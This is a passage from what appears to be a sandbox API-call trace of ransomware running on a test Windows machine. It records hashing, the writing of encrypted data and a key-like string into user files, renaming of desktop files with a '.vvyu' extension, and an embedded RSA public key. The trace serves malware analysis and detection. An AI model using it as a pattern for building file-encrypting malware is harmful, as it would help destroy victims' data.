szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.440] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.440] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.440] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.440] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.440] GetLastError () returned 0x0 [0192.440] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.440] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.440] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.441] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.441] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf350) returned 0x2ea79b0 [0192.441] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95218 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95260 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.442] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa68 [0192.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ac88 [0192.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ac88 | out: hHeap=0x620000) returned 1 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c935e8 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0192.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa68 | out: hHeap=0x620000) returned 1 [0192.445] GetCurrentThreadId () returned 0x66c [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e410 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.446] GetCurrentThreadId () returned 0x66c [0192.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9aa68 [0192.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ac78 [0192.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0192.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ae90 [0192.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ac78 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ae90 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95260 | out: hHeap=0x620000) returned 1 [0192.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa68 | out: hHeap=0x620000) returned 1 [0192.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.463] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xf342, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xf342, lpOverlapped=0x0) returned 1 [0192.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.464] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf347, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.464] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9aa68 [0192.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9aa68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ae98 [0192.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa68 | out: hHeap=0x620000) returned 1 [0192.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.465] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ae98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ae98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ae98 | out: hHeap=0x620000) returned 1 [0192.470] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.470] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.470] CloseHandle (hObject=0x568) returned 1 [0192.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9aa68 [0192.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.474] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\itjgP.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\itjgp.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\itjgP.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\itjgp.m4a.vvyu")) returned 1 [0192.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa68 | out: hHeap=0x620000) returned 1 [0192.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.478] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.481] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f082420, ftCreationTime.dwHighDateTime=0x1d8a0be, ftLastAccessTime.dwLowDateTime=0xeec1d250, ftLastAccessTime.dwHighDateTime=0x1d8a66f, ftLastWriteTime.dwLowDateTime=0xeec1d250, ftLastWriteTime.dwHighDateTime=0x1d8a66f, nFileSizeHigh=0x0, nFileSizeLow=0x14a44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2JjIfMTo45JZEp.jpg", cAlternateFileName="J2JJIF~1.JPG")) returned 1 [0192.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95260 [0192.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95260 | out: hHeap=0x620000) returned 1 [0192.481] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\j2JjIfMTo45JZEp.jpg") returned=".jpg" [0192.481] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j2JjIfMTo45JZEp.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\j2jjifmto45jzep.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.482] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=84548) returned 1 [0192.482] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.485] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x14a1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.485] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.487] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.487] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x14a44, lpOverlapped=0x0) returned 1 [0192.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.488] lstrlenA (lpString="-----BEGIN PUBLIC 